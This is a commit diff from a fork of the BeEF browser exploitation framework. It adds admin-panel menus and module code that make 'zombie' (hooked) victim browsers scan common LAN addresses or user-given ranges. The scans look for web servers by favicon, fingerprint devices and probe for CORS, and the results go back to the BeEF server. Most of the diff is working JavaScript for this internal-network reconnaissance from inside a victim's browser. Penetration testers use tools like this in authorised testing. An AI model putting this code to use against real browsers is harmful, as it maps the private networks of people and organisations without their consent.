Hiddenden/beef
2
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Add options to scan commonly used LAN IPs

Browse Source
This commit is contained in:
Brendan Coles
2015-01-24 18:26:15 +00:00
parent d75adc0899
commit 5d9c62967d
10 changed files with 262 additions and 39 deletions
Download Patch File Download Diff File Expand all files Collapse all files

6
extensions/admin_ui/media/css/base.css
View File

@@ -108,6 +108,12 @@
background-repeat: no-repeat;
}
.network-host-ctxMenu-web {
background-image: url(../images/icons/web.png);
background-size: 16px 16px;
background-repeat: no-repeat;
}
.network-host-ctxMenu-adapter {
background-image: url(../images/icons/adapter.png);
background-size: 16px 16px;

BIN
extensions/admin_ui/media/images/icons/web.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 32 KiB

171
extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabNetwork.js
View File

@@ -141,8 +141,170 @@ ZombieTab_Network = function(zombie) {
}
});
}
},{
text: 'Discover Web Servers',
iconCls: 'network-host-ctxMenu-web',
menu: {
xtype: 'menu',
items: [{
text: 'Common LAN IPs',
iconCls: 'network-host-ctxMenu-network',
handler: function() {
var mod_name = "get_http_servers";
var mod_id = get_module_id(mod_name);
commands_statusbar.update_sending('Favicon scanning commonly used local area network IP addresses for web servers...');
$jwterm.ajax({
contentType: 'application/json',
data: JSON.stringify({"ipRange":"common"}),
dataType: 'json',
type: 'POST',
url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token,
async: false,
processData: false,
success: function(data){
commands_statusbar.update_sent("Command [id: " + data.command_id + "] sent successfully");
},
error: function(){
commands_statusbar.update_fail('Error executing module ' + mod_name + ' [id: ' + mod_id + ']');
}
});
}
},{
text: 'Specify IP Range',
iconCls: 'network-host-ctxMenu-network',
handler: function() {
var ip_range = prompt("Enter IP range to scan:", '192.168.1.1-192.168.1.254');
var mod_name = "get_http_servers";
var mod_id = get_module_id(mod_name);
commands_statusbar.update_sending('Favicon scanning ' + ip_range + ' for web servers...');
$jwterm.ajax({
contentType: 'application/json',
data: JSON.stringify({"ipRange":ip_range}),
dataType: 'json',
type: 'POST',
url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token,
async: false,
processData: false,
success: function(data){
commands_statusbar.update_sent("Command [id: " + data.command_id + "] sent successfully");
},
error: function(){
commands_statusbar.update_fail('Error executing module ' + mod_name + ' [id: ' + mod_id + ']');
}
});
}
}]
}
},{
text: 'Fingerprint HTTP',
iconCls: 'network-host-ctxMenu-fingerprint',
menu: {
xtype: 'menu',
items: [{
text: 'Common LAN IPs',
iconCls: 'network-host-ctxMenu-network',
handler: function() {
var mod_name = "internal_network_fingerprinting";
var mod_id = get_module_id(mod_name);
commands_statusbar.update_sending('Fingerprinting commonly used local area network IP addresses...');
$jwterm.ajax({
contentType: 'application/json',
data: JSON.stringify({"ipRange":"common"}),
dataType: 'json',
type: 'POST',
url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token,
async: false,
processData: false,
success: function(data){
commands_statusbar.update_sent("Command [id: " + data.command_id + "] sent successfully");
},
error: function(){
commands_statusbar.update_fail('Error executing module ' + mod_name + ' [id: ' + mod_id + ']');
}
});
}
},{
text: 'Specify IP Range',
iconCls: 'network-host-ctxMenu-network',
handler: function() {
var ip_range = prompt("Enter IP range to scan:", '192.168.1.1-192.168.1.254');
var mod_name = "internal_network_fingerprinting";
var mod_id = get_module_id(mod_name);
commands_statusbar.update_sending('Fingerprinting ' + ip_range + '...');
$jwterm.ajax({
contentType: 'application/json',
data: JSON.stringify({"ipRange":ip_range}),
dataType: 'json',
type: 'POST',
url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token,
async: false,
processData: false,
success: function(data){
commands_statusbar.update_sent("Command [id: " + data.command_id + "] sent successfully");
},
error: function(){
commands_statusbar.update_fail('Error executing module ' + mod_name + ' [id: ' + mod_id + ']');
}
});
}
}]
}
},{
text: 'CORS Scan',
iconCls: 'network-host-ctxMenu-cors',
menu: {
xtype: 'menu',
items: [{
text: 'Common LAN IPs',
iconCls: 'network-host-ctxMenu-network',
handler: function() {
var mod_name = "cross_origin_scanner";
var mod_id = get_module_id(mod_name);
commands_statusbar.update_sending('CORS scanning commonly used local area network IP addresses...');
$jwterm.ajax({
contentType: 'application/json',
data: JSON.stringify({"ipRange":"common"}),
dataType: 'json',
type: 'POST',
url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token,
async: false,
processData: false,
success: function(data){
commands_statusbar.update_sent("Command [id: " + data.command_id + "] sent successfully");
},
error: function(){
commands_statusbar.update_fail('Error executing module ' + mod_name + ' [id: ' + mod_id + ']');
}
});
}
},{
text: 'Specify IP Range',
iconCls: 'network-host-ctxMenu-network',
handler: function() {
var ip_range = prompt("Enter IP range to scan:", '192.168.1.1-192.168.1.254');
var mod_name = "cross_origin_scanner";
var mod_id = get_module_id(mod_name);
commands_statusbar.update_sending('CORS scanning ' + ip_range + '...');
$jwterm.ajax({
contentType: 'application/json',
data: JSON.stringify({"ipRange":ip_range}),
dataType: 'json',
type: 'POST',
url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token,
async: false,
processData: false,
success: function(data){
commands_statusbar.update_sent("Command [id: " + data.command_id + "] sent successfully");
},
error: function(){
commands_statusbar.update_fail('Error executing module ' + mod_name + ' [id: ' + mod_id + ']');
}
});
}
}]
}
}]
});
});
emptygrid_menu.showAt(e.getXY());
},
rowcontextmenu: function(grid, rowIndex, e) {
@@ -158,7 +320,8 @@ ZombieTab_Network = function(zombie) {
grid.rowCtxMenu = new Ext.menu.Menu({
items: [
{
text: 'Discover HTTP',
text: 'Discover Web Servers',
iconCls: 'network-host-ctxMenu-web',
menu: {
xtype: 'menu',
items: [{
@@ -166,7 +329,7 @@ ZombieTab_Network = function(zombie) {
iconCls: 'network-host-ctxMenu-host',
handler: function() {
var mod_id = get_module_id("get_http_servers");
commands_statusbar.update_sending('Fingerprinting ' + ip + '...');
commands_statusbar.update_sending('Favicon scanning ' + ip + ' for HTTP servers...');
$jwterm.ajax({
contentType: 'application/json',
data: JSON.stringify({"ipRange":ip+'-'+ip}),
@@ -188,7 +351,7 @@ ZombieTab_Network = function(zombie) {
iconCls: 'network-host-ctxMenu-network',
handler: function() {
var mod_id = get_module_id("get_http_servers");
commands_statusbar.update_sending('Scanning ' + ip_range + ' for HTTP servers...');
commands_statusbar.update_sending('Favicon scanning ' + ip_range + ' for HTTP servers...');
$jwterm.ajax({
contentType: 'application/json',
data: JSON.stringify({"ipRange":ip_range}),

2
extensions/network/extension.rb
View File

@@ -11,7 +11,7 @@ module Network
@short_name = 'network'
@full_name = 'Network'
@description = ''
@description = "This extension provides a simple interface for interacting with hosts on a zombie browser's local area networks."
end
end

54
modules/network/cross_origin_scanner/command.js
View File

@@ -16,22 +16,44 @@ beef.execute(function() {
return;
}
// set target IP range
var range = ipRange.match('^([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\-([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))$');
if (range == null || range[1] == null) {
beef.net.send("<%= @command_url %>", <%= @command_id %>, "fail=malformed IP range supplied");
return;
}
// ipRange will be in the form of 192.168.0.1-192.168.0.254
// the fourth octet will be iterated.
// (only C class IP ranges are supported atm)
ipBounds = ipRange.split('-');
lowerBound = ipBounds[0].split('.')[3];
upperBound = ipBounds[1].split('.')[3];
for (var i = lowerBound; i <= upperBound; i++){
ipToTest = ipBounds[0].split('.')[0]+"."+ipBounds[0].split('.')[1]+"."+ipBounds[0].split('.')[2]+"."+i;
ips.push(ipToTest);
// set target IP addresses
if (ipRange == 'common') {
// use default IPs
ips = [
'192.168.0.1',
'192.168.0.100',
'192.168.0.254',
'192.168.1.1',
'192.168.1.100',
'192.168.1.254',
'10.0.0.1',
'10.1.1.1',
'192.168.2.1',
'192.168.2.254',
'192.168.100.1',
'192.168.100.254',
'192.168.123.1',
'192.168.123.254',
'192.168.10.1',
'192.168.10.254'
];
} else {
// set target IP range
var range = ipRange.match('^([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\-([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))$');
if (range == null || range[1] == null) {
beef.net.send("<%= @command_url %>", <%= @command_id %>, "fail=malformed IP range supplied");
return;
}
// ipRange will be in the form of 192.168.0.1-192.168.0.254
// the fourth octet will be iterated.
// (only C class IP ranges are supported atm)
ipBounds = ipRange.split('-');
lowerBound = ipBounds[0].split('.')[3];
upperBound = ipBounds[1].split('.')[3];
for (var i = lowerBound; i <= upperBound; i++){
ipToTest = ipBounds[0].split('.')[0]+"."+ipBounds[0].split('.')[1]+"."+ipBounds[0].split('.')[2]+"."+i;
ips.push(ipToTest);
}
}
WorkerQueue = function(frequency) {

2
modules/network/cross_origin_scanner/config.yaml
View File

@@ -9,7 +9,7 @@ beef:
enable: true
category: "Network"
name: "Cross-Origin Scanner"
description: "Scan an IP range for web servers which allow cross-origin requests using CORS. The HTTP response is returned to BeEF."
description: "Scan an IP range for web servers which allow cross-origin requests using CORS. The HTTP response is returned to BeEF.<br/><br/>Note: set the IP address range to 'common' to scan a list of common LAN addresses."
authors: ["bcoles"]
# http://caniuse.com/cors
target:

30
modules/network/get_http_servers/command.js
View File

@@ -13,10 +13,36 @@ beef.execute(function() {
var timeout = "<%= @timeout %>";
var wait = "<%= @wait %>";
var threads = "<%= @threads %>";
var urls = new Array('/favicon.ico', '/favicon.png');
var urls = new Array('/favicon.ico', '/favicon.png', '/images/favicon.ico', '/images/favicon.png');
// set target IP addresses
if (ipRange != null){
if (ipRange == 'common') {
// use default IPs
ips = [
'192.168.0.1',
'192.168.0.100',
'192.168.0.254',
'192.168.1.1',
'192.168.1.100',
'192.168.1.254',
'10.0.0.1',
'10.1.1.1',
'192.168.2.1',
'192.168.2.254',
'192.168.100.1',
'192.168.100.254',
'192.168.123.1',
'192.168.123.254',
'192.168.10.1',
'192.168.10.254'
];
} else {
// set target IP range
var range = ipRange.match('^([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\-([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))$');
if (range == null || range[1] == null) {
beef.net.send("<%= @command_url %>", <%= @command_id %>, "fail=malformed IP range supplied");
return;
}
// ipRange will be in the form of 192.168.0.1-192.168.0.254
// the fourth octet will be iterated.
// (only C class IP ranges are supported atm)

2
modules/network/get_http_servers/config.yaml
View File

@@ -9,7 +9,7 @@ beef:
enable: true
category: "Network"
name: "Get HTTP Servers (Favicon)"
description: "Attempts to discover HTTP servers on the specified IP range by checking for a favicon."
description: "Attempts to discover HTTP servers on the specified IP range by checking for a favicon.<br/><br/>Note: set the IP address range to 'common' to scan a list of common LAN addresses."
authors: ["bcoles"]
target:
user_notify: ["FF", "IE", "C", "S"]

32
modules/network/internal_network_fingerprinting/command.js
View File

@@ -17,19 +17,8 @@ beef.execute(function() {
ports = ports.split(',');
}
// set target LAN IP addresses
if (ipRange != null){
// ipRange will be in the form of 192.168.0.1-192.168.0.254
// the fourth octet will be iterated.
// (only C class IP ranges are supported atm)
ipBounds = ipRange.split('-');
lowerBound = ipBounds[0].split('.')[3];
upperBound = ipBounds[1].split('.')[3];
for (i=lowerBound;i<=upperBound;i++){
ipToTest = ipBounds[0].split('.')[0]+"."+ipBounds[0].split('.')[1]+"."+ipBounds[0].split('.')[2]+"."+i;
ips.push(ipToTest);
}
} else {
// set target IP addresses
if (ipRange == 'common') {
// use default IPs
ips = [
'192.168.0.1',
@@ -49,6 +38,23 @@ beef.execute(function() {
'192.168.10.1',
'192.168.10.254'
];
} else {
// set target IP range
var range = ipRange.match('^([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\-([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))$');
if (range == null || range[1] == null) {
beef.net.send("<%= @command_url %>", <%= @command_id %>, "fail=malformed IP range supplied");
return;
}
// ipRange will be in the form of 192.168.0.1-192.168.0.254
// the fourth octet will be iterated.
// (only C class IP ranges are supported atm)
ipBounds = ipRange.split('-');
lowerBound = ipBounds[0].split('.')[3];
upperBound = ipBounds[1].split('.')[3];
for (i=lowerBound;i<=upperBound;i++){
ipToTest = ipBounds[0].split('.')[0]+"."+ipBounds[0].split('.')[1]+"."+ipBounds[0].split('.')[2]+"."+i;
ips.push(ipToTest);
}
}
/* Signatures in the form of:

2
modules/network/internal_network_fingerprinting/config.yaml
View File

@@ -9,7 +9,7 @@ beef:
enable: true
category: "Network"
name: "Fingerprint Local Network"
description: "Discover devices and applications in the victim's Local Area Network.<br/><br/>This module uses a signature based approach - based on default logo images/favicons for known network device/applications - to fingerprint each IP address within the LAN.<br/><br/>Partially based on <a href='http://yokoso.inguardians.com/'>Yokosou</a> and <a href='http://code.google.com/p/jslanscanner/'>jslanscanner</a>."
description: "Discover devices and applications in the victim's Local Area Network.<br/><br/>This module uses a signature based approach - based on default logo images/favicons for known network device/applications - to fingerprint each IP address within the LAN.<br/><br/>Partially based on <a href='http://yokoso.inguardians.com/'>Yokosou</a> and <a href='http://code.google.com/p/jslanscanner/'>jslanscanner</a>.<br/><br/>Note: set the IP address range to 'common' to scan a list of common LAN addresses."
authors: ["bcoles", "wade", "antisnatchor"]
target:
user_notify: ["FF", "IE", "C", "S"]